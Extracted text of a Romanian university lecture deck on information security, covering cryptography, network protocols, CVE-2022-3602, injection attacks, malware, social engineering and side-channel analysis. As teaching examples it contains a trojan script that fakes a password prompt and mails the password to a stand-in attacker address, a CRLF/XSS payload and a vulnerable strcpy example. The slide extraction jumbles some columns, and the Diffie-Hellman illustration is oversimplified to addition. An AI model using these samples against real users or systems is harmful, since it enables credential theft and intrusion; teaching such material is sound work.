Documente Academic
Documente Profesional
Documente Cultură
2022 - 2023
§ Leonard Pițu
§ 38 ani
§ Un copil și un câine J
§ Pasionat de tehnologie
§ 15+ ani de experiență în domeniu
CE ESTE SECURITATEA INFORMAȚIEI?
§ Atâta timp cât există un lucru interzis lumea va fi curioasă și motivată să obțină acel lucru.
• Atacatori individuali
• Persoane singulare ce urmăresc un scop financiar sau caută faima
• Au succes limitat în acțiunile lor
• Devin renumiți când sunt prinși J
• Organizații „private”
• Grupuri transfrontaliere de atacatori talentați
• Urmăresc o agendă proprie (au fie un scop financiar fie unul politic sau social)
• Sunt bine organizați, greu de prins și au o rată mare de succes
• Organizații statale
• Sunt afiliați unuia sau mai multor state
• Sunt fie organizații neoficiale fie parte a unor servicii secrete
• Au resurse cvasi nelimitate
Sursa:
SCURTĂ ISTORIE A „ATACURILOR” https://en.wikipedia.org/wiki/Enigma_machine#Breaking_Enigma
CIBERNETICE (1)
Mașina ENIGMA ENIGMA
Sursa: https://spectrum.ieee.org/the-real-story-of-stuxnet
PRINCIPII DE BAZĂ I
§ “Dacă e secret e sigur” sau poate că nu…
§ “ascunderea” datelor se bazează pe principii matematice (astăzi) și poartă numele de criptografie (vgr. „kryptós”, ascuns, și –
„grafie”, scriere; scriere cu alfabet secret)
§ Piloni ai tehnicilor criptografice:
• Confidențialitatea: datele sunt disponibile numai destinatarilor; datelor sunt criptate înainte de transmitere astfel încât
acestea nu pot fi citite în timpul transmiterii;
• Integritatea: datele sunt protejate de o modificare neautorizata în timpul transmiterii, astfel încât datele recepționate sunt
identice cu cele transmise; se utilizează funcții de hașurare (eng. „hash”);
• Disponibilitatea: oferă capacitatea unui sistem de a fi mereu pregătit pentru acțiunile utilizatorului;
• Autentificarea: verificarea originalității unui mesaj prin verificarea legitimității expeditorului de către destinatar;
• Ne-repudierea: verificarea ce asigură că expeditorul unui mesaj este unica persoană care l-ar fi putut trimite - expeditorul
nu poate contesta că a transmis mesajul; se utilizează semnături digitale.
PRINCIPII DE BAZĂ II
§ “Ce e important trebuie ascuns” J
§ Asimetrică
§ Se bazează pe o pereche de chei: una secretă, proprie fiecărui partener de comunicație și una publică, cunoscută tuturor partenerilor de comunicație
§ Se pot utiliza mai multe canale de comunicație simultan
§ În cazul în care Alice dorește să îi trimită lui Bob un mesaj criptat, sunt executați următorii pași:
§ Se descarcă, de la autoritatea de certificare, cheia publică a lui Bob;
§ Se încarcă datele în clar alături de cheia publică a lui Bob în algoritmul criptografic;
§ Rezultatul criptării (criptograma) este trimis lui Bob folosind orice metodă de comunicație, indiferent dacă este sigură sau nu
§ Pentru a decripta mesajul, Bob va utiliza cheia sa privată pe care o va încărca alături de criptogramă
§ Permite semnarea mesajelor:
§ Alice semnează mesajul utilizând cheia ei private
§ Rezultatul semnăturii este trimis lui Bob folosind orice metodă de comunicație, indiferent dacă este sigură sau nu
§ Bob descarcă cheia publică a lui Alice pe care o va încărca alături de mesajul semnat pentru a-l „decripta”
SIMETRIC VS. ASIMETRIC
Algoritm criptografic Avantaje Dezavantaje
Criptare simplă – este ușor de executat; este suficient ca toți partenerii de comunicație să dețină secretul (cheia de criptare). Este necesar un canal sigur de comunicație care să permită schimbul de chei intre cei doi parteneri. Schimbul de
Algoritmii nu necesită reglaje sau alte premise pentru efectuarea calculelor. chei între cei doi parteneri de comunicație reprezintă primul și cel mai important element de securitate al
acestei clase de algoritmi criptografici.
Prin natura algoritmului se pot cripta și decripta, local, fișiere sau mesaje. Pentru aceasta este suficientă o singură cheie care
este folosită și pentru criptare și pentru decriptare. Numărul mare de chei (conform standardului, câte o cheie criptografică pentru fiecare doi parteneri de
comunicație) poate crea probleme în ceea ce privește administrarea acestora.
Sunt algoritmi rapizi (în general cu un ordin de mărime mai rapizi decât cei asimetrici).
Originea și originalitatea mesajelor nu poate fi verificată. Ținând cont că ambii parteneri folosesc aceeași cheie,
Consumul de resurse este redus: implementările software pot rula chiar și pe microcontrolere pe 8 biți, iar cele hardware nu nu se poate verifica cine este expeditorul și cine este destinatarul.
sunt cu mult mai mari decât o interfață serială standard.
Simetric
Previne atacurile „în masă” datorită faptului că fiecare pereche de parteneri are o cheie (conform standardului [103]) și deci
un eventual atac ar compromite doar comunicația între doi parteneri, lăsând neafectate comunicația cu ceilalți parteneri.
Oferă o soluție pentru principalul dezavantaj al criptării simetrice, și anume distribuirea cheii de criptare. În acest caz doar Cheile publice trebuie autentificate – nu este recomandată utilizarea unor chei publice înainte ca autenticitatea
cheia publică este distribuită, în timp ce cheia privată rămâne secretă. lor să fie verificată.
Oferă posibilitatea autentificării mesajelor prin semnarea digitală a acestora. Astfel, dacă destinatarul dorește determinarea
originalității mesajului primit, trebuie doar verifice dacă semnătura digitală este cea corectă. Operația nu este diferită de cea Algoritmii criptografici asimetrici sunt lenți. Nu este recomandată utilizarea lor pentru criptarea unor mesaje
de criptare, respectiv decriptare a unui mesaj, fiind deci ușor de aplicat. mari sau a unor cantități semnificative de date.
Oferă posibilitatea de detecție a manipulării mesajelor prin utilizarea de semnături digitale alături de criptare. În cazul în care Necesită un număr mai mare de resurse și un număr de componente dedicate (cum ar fi generatoarele de
un atacator manipulează mesajul, semnătura digitală se va schimba astfel încât mesajul va fi automat invalidat. numere aleatoare).
Asimetric Utilizând semnături digitale, expeditorul nu poate nega trimiterea mesajului. Datorită acestui fapt, criptografia asimetrică Un atac de securitate ar putea permite unui atacator să citească toate mesajele celui a cărui cheie a fost
îndeplinește cerința de non-repudiere a mesajelor criptate. interceptată.
Pierderea cheii private înseamnă compromiterea totală a securității deoarece cu ajutorul acesteia pot fi
decriptate toate mesajele schimbate cu toți partenerii.
FUNCȚII DE HAȘURARE („HASHING”)
§ Asigură integritatea mesajelor
§ Transformă un mesaj de o lungime arbitrară într-o „sumă de control” de lungime fixă FĂRĂ posibilitatea
de a calcula înapoi mesajul inițial (diodă de date)
§ Suma poartă numele de „hash” sau „digest” în literatura de specialitate; lungimea șirului de control este
între de regulă între 128 și 512 biți
§ În cazul în care Alice dorește să îi trimită lui Bob un mesaj a cărui integritate Bob o poate verifica:
§ Se calculează hash-ul mesajului care urmează să fie transmis către Bob;
§ Hash-ul este criptat și trimis către Bob într-un mesaj separat;
§ Mesajul criptat este trimis către Bob;
§ Bob decriptează mesajul și recalculează hash-ul;
§ Bob decriptează hash-ul primit de la Alice și-l compară cu cel calculate de el – daca cele 2 sunt identice atunci
mesajul este cel original, trimis de Alice.
§ Algoritmi utilizați: SHA1, SHA2, SHA3, MD4, MD5
SCHIMB DE CHEI
§ Nicio metoda de criptare nu este utilă dacă cei doi parteneri nu au cheia potrivită
§ „Față-în-față”
§ Nu este practică decât în cazuri excepționale
§ Electronică
§ Este imperios necesară în condițiile erei „Internet”
§ Diffie-Hellman comes to the rescue J
§ Această metode permite agrearea unui secret folosindu-se de canale publice de comunicație. Un exemplu practic, ușor de
înțeles poate fi:
• Alice și Bob agreează un număr oarecare (5) care nu trebuie ascuns
• Alice alege un număr (8) pe care șl păstrează secret
• Bob alege un număr (4) pe care șl păstrează secret
• Alice calculează suma dintre numărul public și numărul ei secret (5+8=13) iar rezultatul i-l trimite lui Bob
• Bob calculează suma dintre numărul public și numărul lui secret (5+4=9) iar rezultatul i-l trimite lui Alice
• Alice calculează suma dintre numărul primit de la Bob și numărul ei secret (9+8=17)
• Bob calculează suma dintre numărul primit de la Alice și numărul lui secret (13+4=17)
§ Există posibilitatea unui atac de tip „man-in-the-middle”
REȚELE DE
CALCULATOARE I
Sursa: https://www.allaboutelectronics.org/frequency-division-multiplexing-fdm-explained/
Cum ajung de la
https://www.wikipedia.org
La
91.198.174.192
?
CUM MERGE INTERNETUL I
§ Cum ajung de la https://www.wikipedia.org la 91.198.174.192?
Sursa: https://en.wikipedia.org/wiki/Domain_Name_System
CUM MERGE INTERNETUL II
Domain Name System
§ DoS
§ DDoS
§ DNS poisoning
§ DNS amplification
§ Fast-flux DNS
DOS/DDOS Sursa: https://en.wikipedia.org/wiki/Denial-of-
service_attack#/media/File:Stachledraht_DDos_Attack.svg
USB: Universal Serial Bus DCAP: Data Link Switching Client ARP: Address Resolution
Access Protocol Protocol
Ethernet: Ethernet physical layer
FDDI: Fiber Data Distribution
WiFi: radio network layer Interface BGP: Border Gateway Protocol
DSL: Digital subscriber line HDLC: High-level Data Link ICMP: Internet Control Message
Etherloop: Ethernet and DSL Control Protocol
combination LAPD: Link Access Protocol D- IPv4: Internet Protocol version 4
Infrared: Infrared radiation channel
IPv6: Internet Protocol version 6
Frame Relay PPP: Point-to-Point Protocol
IPX: Internetwork Packet
SDH: Synchronous Digital STP: Spanning Tree Protocol Exchange
Hierarchy VTP VLAN: Virtual Trunking
Protocol for Virtual LAN OSPF: Open Shortest Path First
SONET: Synchronized optical
network MPLS: Multi-Protocol Label RARP: Reverse Address
Switching Resolution Protocol
OSI – NIVELURI ALE HOSTULUI
Nivel 4 - Transport Nivel 5 - Sesiune Nivel 6 - Prezentare Nivel 7 - Aplicație
§ Este vulnerabil:
§ Replay attacks -> se utilizează autentificarea
ARP
§ Address Protocol Resolution
§ Este vulnerabil:
§ ARP spoofing (ARP poisoning – Mallory “otrăvește” memoria cache asociind adresei IP atacate adresa sa
MAC)
BGP
§ Border Gateway Protocol
§ Este vulnerabil:
§ …
IPV4/IPV6
§ Internet Protocol
§ Este vulnerabil:
§ …
IPV4 VS IPV6
INTERNET
§ Ion sta pe strada Sforii, numărul 12
§ Resursele dintr-o rețea sunt identificate prin URL (Uniform Resource Locator) folosind
schemele URI-uri (Uniform Resource Indentifier) http și https; URI-urile sunt codate ca
hyperlinkuri in cadrul hyperdocumentelor
§ În cadrul comunicației dintre client și server:
§ Clientul realizază o conexiune stabilă cu serverul
§ Clientul inițiază comunicația
§ Atât clientul cât și serverul pot întrerupe oricând comunicația
Metode
Request Response
Request has has Idem pote Cacheabl
RFC Safe
m ethod payload payload nt e
body body
GET RFC 9110 Optional Yes Yes Yes Yes
HEAD RFC 9110 Optional No Yes Yes Yes
POST RFC 9110 Yes Yes No No Yes
PUT RFC 9110 Yes Yes No Yes No
DELET E RFC 9110 Optional Yes No Yes No
CONNECT RFC 9110 Optional Yes No No No
OPT IONS RFC 9110 Optional Yes Yes Yes No
T RACE RFC 9110 No Yes Yes Yes No
PAT CH RFC 5789 Yes Yes No No No
HTTP
Sursa: https://www.oreilly.com/library/view/restful-java-web/9781788294041/1889f99d-f907-41c3-a0f0-925bbf1d3825.xhtml
HTTPS
§ Hyper Text Transfer Protocol Secure
§ Este o extensie a protocolului http ce adaugă metode de securitate -> nu se pot “ascunde”
datele de protocol (de exemplu pagina și portul accesat)
§ Peste 80% din paginile web existente folosesc https
§ De regulă doar unul din parteneri este autentificat (clientul [browserul] autentifică serverul)
§ Clientul are prestocată o listă de autorități de certificare cu ajutorul cărora poate verifica
autentiticatea certificatelor puse la dispoziție de serverul web
§ Foloeste protocoalele SSL sau TLS din nivelul de transport creând un canal criptat de
comunicație peste rețele insecurizate
SSL
§ Secure Socket Layer
• Clientul
• Cere serverului o conexiune sigură
• Ii prezintă algoritmii criptografici pe care îi cunoaște
• Serverul
• Alege din listă un algoritm criptografic și unul de hașurare
pe care le cunoaște
• Notifică clientul de selecția făcută
• Se identifică prin intermediul unui certificat digital
• Clientul
• Verifică veridicitatea certificatului la autoritatea de
certificare
• Timite un număr aleator, criptat cu cheia publică a
serverului, sau
• Agreează o cheie cu serverul folosind Diffie-Hellman
PAGINA WEB
Sursa: https://html-css-js.com
Sursa: https://brytdesigns.com/html-css-javascript-whats-the-difference
VULNERABILITĂȚI & EXPLOIT-URI
Exemplu: CVE-2022-3602
Common Vulnerabilities and Exposures
§ X.509 Email Address 4-byte Buffer Overflow
§ Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2022-3602
#include <stdio.h>
0xFFFFFFFF Kernel
#include <string.h> Stack
void test(char *name) { § argv[1] este folosit în apelul funcției test() Adresă de returnare
char buf[100]; § se copiază valoarea lui argv[1] în Stack (ca
Pointer de bază
strcpy(buf, name); parametru al funcției test()) Stack
printf("Welcome %s\n", buf);
} Funcția test() Buffer
Înlocuim:
§ EEEEE (0x45 0x45 0x45 0x45) cu
§ 0x6cfdffbf (una din adresele valide)
CVE-2022-3602
§ A buffer overrun can be triggered in X.509 certificate verification, specifically in name
constraint checking.
§ An attacker can craft a malicious email address to overflow four attacker-controlled bytes on
the stack. This buffer overflow could result in a crash (causing a denial of service) or
potentially remote code execution.
§ Datorită unei erori o variabilă era incrementată odata mai mult decât era necesar producând
un buffer overflow
§ FIX-ul
VALIDAREA (SAU LIPSA ACESTEIA) INTRĂRILOR
§ Este un cumul de măsuri de securitate ce permit „curățarea” valorilor furnizate de client către
server
§ Se aplică în mare parte serverului dar și clienților
§ Se aplică în egală măsura aplicațiilor web cât și celor desktop
§ Atacatorul se bazează pe faptul că aplicația nu se așteaptă la acea intrare motiv pentru care va
reacționa diferit față de cum a fost proiectată:
§ Furnizează un răspuns ce conține informații care ar fi considerate în mod normal secrete
§ Mersul logic al operațiunilor este modificat
§ Execută cod arbitrar, furnizat de atacator
§ Etc.
§ Probleme:
§ DoS (utilizare prea mare de resurse)
§ Crash
§ Exfiltrare de date
§ Escaladare de privilegii
§ Soluții:
§ Testare
§ Sanitizare intrări
§ Reprogramare
CRLF INJECTION
§ Se bazează pe o serie de caractere speciale folosite pentru a simboliza sfârșitul unei linii de text
(EOL)
§ CRLF – Carriage Return (ASCII 13 - 0x0D, \r), Line Feed (ASCII 10 - 0x0A, \n)
§ Windows = CRLF
§ Linux/UNIX = LF
§ MacOS (vechi) = CR
§ MacOS (OSX, nou) = LF
§ HTTP = CRLF
CRLF INJECTION
§ Orice cerere (GET) HTTP este însoțită de un răspuns
§ Un atacator poate executa un atac inserând caractere CRLF – este atacat serverul folosind
clientul!
§ Atacatorul utilizează CRLF pentru a-i „transmite” serverului un mesaj modificat
§ Serverul ”crede” că headerul s-a terminat și urmează un alt obiect
§ Cum funcționază:
§ Atacatorul inserează %0d și %0a în textul trimis către server
§ Dacă inserează de 2 ori CRLF serverul consideră ca headerul HTTP s-a terminat iar restul textului este
conținutul (HTTP response splitting)
§ Atacatorul poate trimite apoi orice cerere dorește către server
CRLF INJECTION
X-Header-Value: unitbv
§ Clientul poate schimba valoarea headerului folosind sintaxa:
?name=iesc
§ Atacatorul poate utiliza același mecanism pentru a-i cere serverului să facă altceva:
?name=iesc%0d%0a%0d%0a<script>alert(document.domain)</script>
§ Atacatorul:
§ Are ca țintă ocolirea politicii „same-origin” setată de serverul web
§ Manipulează serverul pentru a-i trimite clientului cod malițios
CRLF INJECTION
Cross-site scripting (XSS)
§ Reflexted XSS
Este identic cu precedentul atac dar serverul stochează codul și-l returnează la următoarea
cerere odată cu headerul HTTP
§ DOM-based XSS
Are loc atunci când pagina web returnează rezultatul unui script direct într-un DOM, fără a
verifica sursa scriptului
CSV INJECTION
§ Se mai numește „formula injection”
§ Excel sau LibreOffice Calc interpretează orice începe cu ”=” ca fiind o formulă
§ Atacatorul nu trebuie decât să genereze un fișier CSV care dacă este deschis de victimă execută în mod „automat” atacul
§ Se bazează pe diverse atacuri de securitate ce permit manipularea paginilor ce exportă date în format CSV
Sursa: https://hazelcast.com/glossary/serialization/
§ Serializarea datelor este considerată nesigură atunci când acest proces este executat de p pagina
web și nu de către server (client side vs. server side)
§ Soluții:
§ Sanitizare intrări
§ Separarea controalelor utilizatorului de cele ale baze de date
§ Parametrizarea căutărilor în baza de date
§ Proceduri stocate
§ Validarea unei liste de căutări predefinite
§ Etc.
AMENINȚĂRI
§ O amenințare este o acțiune sau un eveniment ce pot avea un impact negativ asupra unui
sistem de calcul sau asupra unei aplicații
§ Amenințarea poate sa fie:
§ Intenționată (hacking)
§ Accidentală (dezastru natural, erori umane)
§ Un virus modern folosește tehnici evazive (de exemplu modificarea dinamică a codului)
TROIAN
§ Este bazat pe vechiul „cal troian” din Troia antică
§ Se folosește de tehnici de inginerie socială mascându-se drept ceva de interes pentru subiectul
atacat
§ Față de un virus sau vierme, un troian NU face nimic ”rău”
§ De regulă, după infecție, oferă doar o „poartă de intrare” în sistemul infectat
:
stty –echo
/bin/echo -n "Password for `whoami`: ”
read x
/bin/echo "”
stty echo echo $x | mail -s "`whoami` password" mallory@bad.com
sleep 1
echo Sorry.
rm $0
exit 0
VIRUS/VIERME/TROIAN
Wall of Fame J
ILOVEYOU
§ A infectat peste 10 milioane de calculatoare ce rulează Windows începând cu mai 2000
STUXNET
§ ...
CryptoLocker
§ A avut loc intre 5 septembrie 2013 si mai 2014
§ S-a propagat ca atașament al unor mesaje de tip e-Mail (ub forma unui fișier zip ce conținea un fișier executabil mascat ca un fișier pdf)
§ Odată ajuns pe un sistem de calcul cripta anumite tipuri de fișiere
§ S-a plătit o recompensă totală de 41928BTC (aprox. 680 mil $)
SPYWARE
§ Este un program de calculator menit sa colecteze date pe care le trimite unui terț
§ Există 4 tipuri:
§ Adware
§ Sisteme de monitorizare (monitors)
§ Sisteme de urmărire (tracker)
§ Troieni
SPYWARE
Exemple...
§ Aplicații DRM care „sună” acasă și transmit informații despre cum sunt folosite produsele
respective
§ keyloggers = aplicații sau dispozitive care înregistrează tastele apăsate
§ rootkit = aplicații software menite a escalada privilegiile de acces ale unui utilizator oarecare
§ web beacon = un cumul de tehnologii care permit unui actor să urmărească dacă un anume
conținut a fost accesat sau nu (ex. spy pixel)
Scopul: infiltrare fără detecție, furtul datelor fără detecție, autoștergere fără probleme
ADWARE
§ Aplicații gratuite sau mai bine zis „gratuite” ce prezintă diverse reclame
§ Pot fi:
§ „legitime”
§ Malițioase
§ Folosesc:
§ Cai troieni
§ Vulnerabilități multiple sau de tip „zero day”
§ Tehnici de social engineering
§ În primele 6 luni ale lui 2018 au fost 181M atacturi; în 2021 623M
RANSOMWARE
Wall of Fame J
WannaCry
§ A țintit sisteme de rulează Windows
§ Este considerat ȘI un vierme căci deține un mecanism de autoreplicare
§ A pornit din Coreea de Nord
§ Primele versiuni au fost scrie in Visual C++ 6 lansat in 1998
§ A folosit exploitul EternalBlue, dezvoltat de NSA (CVE-2017-0144)
§ A infectat 230000 de sisteme in 150 de țări în doar 24 de ore
§ Recompensa varia între 300$ și 600$
SOCIAL ENGINEERING
§ Este o formă de manipulare psihologică cu scopul de a obține informații clasificate fără să fie
efectuat un atac de propriu de securitate
§ Se folosește de diverse trucuri pentru a strânge informații ce mai apoi sunt folosite în atacuri
complexe
§ Este o formă diferită, mult mai complexă, de înșelătorie clasică
§ Tinde să pară un număr mare de evenimente aleatoare, fără vreo legătură între ele
§ Se exploatează:
§ Lipsa cunoștințelor
§ Credulitatea
§ Contextul
§ Emoțiile
SOCIAL ENGINEERING
§ Are 4 faze:
§ Pregătirea
§ Pasul cel mai important
§ Aparent nu are loc niciun atac J
§ Infiltrarea
§ Atacatorul este un oarecare care-și vede de treaba lui J
§ Exploatarea
§ Odată câștigată increderea prin intermediul primilor 2 pași, atacatorul trece la treaba
§ „Decuplarea”
§ Poate sa fie lentă sau rapidă
§ Poate lăsa urme sau, din contră, poate șterge orice urmă
SOCIAL ENGINEERING
Sursa: https://www.theguardian.com/us-news/2020/jan/28/donald-
Sursa: https://www.vox.com/policy-and-
politics/2018/3/23/17151916/facebook-cambridge-analytica-trump-
diagram
trump-facebook-ad-campaign-2020-election
SOCIAL ENGINEERING
§ Se bazează complet pe modul uman de gândire și pe capacitatea noastră de a lua decizii
„informate”
§ Exploatează felul părtinitor de a raționa, caracteristic tuturor persoanelor
§ Principii de bază:
§ Autoritate: orice „autoritate” are șansă mai mare să treacă nevăzut
§ Intimidare: amenințarea cu consecințe negative
§ Consens: „dacă zice X și Y înseamnă ca e adevărat”; „doar a zis ieri la A3...”
§ Sărăcie: dacă voit nu sunt date informații dar se fac aluzii se crește cererea J
§ Urgență: orice e urgent provoacă un sentiment de agitație ce duce la pierderea rațiunii
§ Familiaritate: „dacă e de-al casei e de încredere”
SOCIAL ENGINEERING
§ Vectori de atac:
§ Vishing
§ Phishing/Spear Phishing
§ Smishing
§ Impersonare
VISHING
§ Voice Phishing
§ COVID-19 a adus o pleiadă de atacuri bazate pe frica oamenilor (și deci dorința) de virus
PHISHING/SPEAR PHISHING
§ Este o tehnică ce utilizează mesaje de tip e-mail pentru a păcălii oamenii să divulge informații
secrete
§ Mesajele pot fi:
§ Complet false
§ Interceptate și modificate
§ Protecție:
§ Filtrare de mesaje
§ Alerte în browser
§ „Augmentarea” autentificării
§ MFA
§ Monitorizare + contact autorități
§ Etc.
PHISHING/SPEAR PHISHING
SMISHING
§ Este o tehnică ce utilizează mesaje de tip SMS
§ Se bazează pe faptul că tot mai multe servicii online trimit un SMS drept confirmare
§ Se folosesc de curiozitatea umană:
§ Oferă informații incomplete
§ Indică către servicii online ce pot rezolva o problemă
§ Impersonează servicii publice, comune tuturor
HARDWARE HACKING
relocate_code Pointer at: 81fc0000
flash manufacture id: c8, device id 40 16
find flash: GD25Q32B
============================================
Ralink UBoot Version: 4.3.0.0
§ Se identifică cu ajutorul unor echipamente --------------------------------------------
ASIC 7628_MP (Port5<->None)
standard nivelul de tensiune acceptat de DRAM component: 256 Mbits DDR, width 16
DRAM bus: 16 bit
circuitele routerului Total memory: 32 MBytes
Flash component: SPI Flash
§ Prin căutări succesive se identifică viteza de Date:Mar 19 2018 Time:09:23:08
============================================
comunicare icache: sets:512, ways:4, linesz:32 ,total:65536
dcache: sets:256, ways:4, linesz:32 ,total:32768
§ Rezultă... ##### The CPU freq = 580 MHZ ####
estimate memory size =32 Mbytes
RESET MT7628 PHY!!!!!!
continue to starting system.
0
disable switch phyport...
LINUX started...
CRIPTANALIZĂ
§ Înseamnă „dezlegarea” secretelor conținute de criptograme
§ La bază stau 4 metode de „lucru”:
§ Criptanaliză prin „forță brută”
§ Folosește tehnici simple în încercarea de a ghicii textul în clar
§ Mașina COPACABANA folosea 128 de FPGA-uri VITEX-4 pentru a putea sparge cu efort minim algoritmul DES
§ Criptanaliza diferențială
§ Pornește de la ideea ca un text în clar influențează în mod liniar o criptogramă
§ Folosește texte în clar ce sunt separate între ele de o diferență constantă, definită de o funcție matematică
§ După criptare atacatorul calculează diferența dintre criptogramele obținute
§ Scopul = descoperirea unor modele statistice de distribuție a celor două diferențe
§ Criptanaliza liniară
§ Cea mai răspândită metodă de atac asupra algoritmilor ce folosesc blocuri de date
§ Are 2 pași:
§ Construirea unui set de ecuații liniare ce descriu textul în clar, criptogramele și cheia de criptare utilizată
§ Utilizarea ecuațiilor, împreună cu perechile cunoscute de texte în clar – criptograme, pentru a determina cheia de criptare utilizată
§ Criptanaliza algebrică
§ presupune rezolvarea unui set de ecuații pentru determinarea cheii de criptare
§ Are 3 pași:
§ Exprimarea operațiilor matematice ale algoritmului criptografic sub forma unui set de ecuații
§ Datele cunoscute sunt introduse în sistemul de ecuații creat
§ Sistemul de ecuații este rezolvat relevând cheia de criptare
ATACURI
§ Atacuri
§ Pasive: circuitul este operat conform specificațiilor producătorului iar criptanaliza este efectuată doar prin
observarea proprietăților fizice
§ Active: circuitul criptografic este manipulat direct, prin intruziune fizică
§ Atacuri
§ Neinvazive: nu presupun manipularea fizică a circuitelor digitale integrate
§ Tipuri:
§ Atacuri ce exploatează timpii de execuție
§ Atacuri ce exploatează variațiile instantanee de consum ale circuitului analizat
§ Atacuri ce exploatează erorile ce apar în cazul în care circuitul atacat este supus unor parametrii ce depașesc limitele
specificate de producător
§ Atacuri ce exploatează radiația electromagnetică a circuitului
§ Semi-invazive: presupun înlăturarea carcasei circuitului digital integrat, oferind acces direct la pastila de
siliciu
§ Invazive: presupun accesul fizic la toate componentele circuitului atacat
§ Sunt considerate extrem de periculoase, deoarece nu există nici o limită în ceea ce privește posibilitățile pe care
atacatorul le are la dispoziție
ANALIZA PUTERII CONSUMATE
§ Se bazează pe faptul că orice circuit electronic absoarbe energie electrică în timpul funcționării sale
§ În general, puterea absorbită este proporțională cu activitatea circuitului
§ A apărut în anii ’90 și a reprezentat o piatră de temelie a criptanalizei moderne
§ Prevede înregistrarea curbelor (sau caracteristicilor) de consum ale circuitului analizat, pe parcursul
operației de interes
§ Curbele au o formă distinctă astfel încât atacatorul poate „determina” operația și datele care sunt
executate de circuit, la un moment dat
ANALIZA PUTERII CONSUMATE
§ Există 2 tipuri:
§ Analiza simplă de putere
§ Constă în analiza vizuală a variației curentului absorbit de circuitul analizat în timp ce
execută operația criptografică de interes
§ Primii algoritmi criptografici atacați cu ajutorul acestei metode au fost DES și RSA (dar
merge la orice algoritm)
§ Analiza diferențială de putere
§ Sunt necesare număr mai mare de curbe de consum, motiv pentru care analiza
acestora se realizează prin metode statistice
§ Dacă curbele de consum au o rezoluție suficient de mare, poate evidenția
instrucțiunile, respectiv profilul de consum al circuitului digital analizat
§ Pentru evidențiere se consideră d, cel mai semnificativ bit din primul octet al
textului în clar ce urmează a fi criptat
§ Se aleg, aleatoriu, 1000 de texte în clar care vor fi mai apoi criptate
§ Pentru fiecare operație de criptare se va înregistra o curba de consum
§ Statistic se poate considera că în 50% din cazuri d are valoarea „0” iar în 50%
valoarea „1”
§ Pentru o evaluare simplă a efectului lui d asupra consumului, se calculează
diferența dintre curbele medii de putere, pentru cazul d=0 și d=1
ANALIZA PUTERII CONSUMATE
EXEMPLU: AES
§ Analiza simplă de putere evidențiază:
§ Operația criptografică durează 283µs
§ Algoritmul executat are 10 runde de calcul: primele 9 runde sunt identice ca lungime, iar cea de-a 10-ea este
mai scurtă
§ Prima parte a operației înregistrate are un consum relativ constant
§ La sfârșitul operației este vizibilă o creștere rapidă a consumului pentru o scurtă perioadă de timp
§ Luând în calcul observațiile de mai sus, alături de faptul că analiza a fost efectuată pe un
microcontroler de uz comun (ATmega328, 16MHz), se poate concluziona faptul că algoritmul
analizat este o implementare software a clasicului AES:
§ Consumul inițial este dat de procesul de încărcare a datelor, respectiv de accesul la memoria de lucru
§ Cele 10 vârfuri de consum sunt tipice celor 10 runde de calcul ale algoritmului AES: primele 9 identice ca
lungime iar cea de-a 10-ea mai scurtă deoarece operația MixColumns nu mai este executată
§ Algoritmul implementat utilizează o cheie de 128 biți alături de un bloc de date de dimensiune identică
MĂSURI DE PROTECȚIE
§ Există o varietate mare de atacuri și metode de atac, deci:
§ Nicio măsură de protecție, luată individual, nu este suficientă
§ Măsurile pur tehnologice sunt insuficiente
§ Factorul uman fără ajutor tehnologic nu rezolvă problema
§ Protecția:
§ Factorului uman
§ Infrastructurii (centre de date, rețele, spații de birouri etc.)
§ Datelor
PROTECȚIA FACTORULUI UMAN
§ Orice organizație este definită de factorul uman (factori de decizie, colaboratori, angajați, muncitori
etc.)
§ Factorul uman face de multe ori diferența dintre succes și eșec
§ Factorul uman este:
§ Susceptibil la atacuri de tip social engineering
§ Rău intenționat (în caz de demotivare, răzbunare sau antipatii...)
§ Responsabil în cele din urmă de întreaga organizație
§ Deci:
§ Factorul uman este cel mai important activ al unei organizații
§ Dacă factorul uman este antrenat corespunzător atunci organizația va trece cu bine momentele dificile
PROTECȚIA FACTORULUI UMAN
§ Ce se poate face:
§ Analiză de risc la nivel organizațional
§ Identificarea persoanelor cheie din organizație
§ Asigurarea unei continuități a activității în cazul unor evenimente neprevăzute
§ Măsuri:
§ Antrenarea și instruire continuă
§ Campanii de conștientizare
§ Motivarea performanței
§ Stimularea proactivității
§ Remunerarea excelenței
PROTECȚIA DATELOR
§ Se bazează pe o abordare piramidală ce pleacă de la protecția spațiilor fizice și a infrastructurii
§ Folosește preponderent metode tehnologice
§ Nu există o tehnologie unică ce rezolvă problema sau problemele – se folosesc totdeauna o multitudine
de soluții
§ Metode tipice:
§ Criptare
§ Autentificare multi-factor
§ Entitlement
§ Etc.
§ Măsuri:
§ Monitorizare video
§ Control acces (simplu, ierarhic, inelar etc.)
§ Clădiri inteligente
§ Restricționare pe bază de nivel de securitate
§ Restricționare pe bază de nevoi
PROTECȚIA INFRASTRUCTURII
CENTRE DE DATE
§ Ce se poate face:
§ Analiză de risc
§ Analiză de afaceri
§ Plan de continuitate a afacerii
§ Măsuri:
§ Clasificarea activelor fizice în funcție de datele stocate
§ Organizarea centrelor de date în funcție de importanța pentru afacere
§ Locații secundare sau terțe
§ Acces pe bază de proceduri stricte (dar eficiente !!!)
§ Monitorizare strictă (camere video care acoperă ÎNTREGUL spațiu, control acces inelar, cu factori multiplii
etc.)
PROTECȚIA INFRASTRUCTURII
REȚELE
§ Ce se poate face:
§ Monitorizare trafic
§ Identificare modele
§ Utilizare de instrumente software, reguli statice și/sau dinamice
§ Control al accesului (pe bază de autentificare simplă și/sau reputație)
§ etc.
§ Măsuri:
§ Segmentare a rețelelor (sau microsegmentare)
§ Inventariere active
§ Diode de date
§ Copii de siguranță
§ Firewall
§ VPN
§ Sandboxing
§ IPS/IDS
§ SIEM
PROTECȚIA INFRASTRUCTURII
INVENTARIERE ACTIVE
§ Scopul este:
§ Identificarea tuturor activelor
§ Identificarea activelor critice („golden nuggets”) și a celor mai slabe („weakest link”)
§ Realizarea de planuri de contingență pentru activele cu „probleme”
§ Reguli de bază:
§ Deny all -> nu permite nicio conexiune
§ Allow port XYZ -> permite DOAR portul XYZ
§ Poate fi:
§ Firewall la nivel de sistem
§ Firewall la nivel de aplicație (proxy)
PROTECȚIA INFRASTRUCTURII
VPN
§ Permite:
§ Realizarea unui ”tunel” criptat între rețeaua organizației și client
§ Comunicația sigură peste medii publice/nesigure
§ DAR:
§ Nu permite monitorizarea facilă a traficului
§ Este greu de identificat o conexiune VPN malițioasă
§ De multe ori devine foarte complex si greu de setat/manageriat
PROTECȚIA INFRASTRUCTURII
IPS/IDS + SIEM
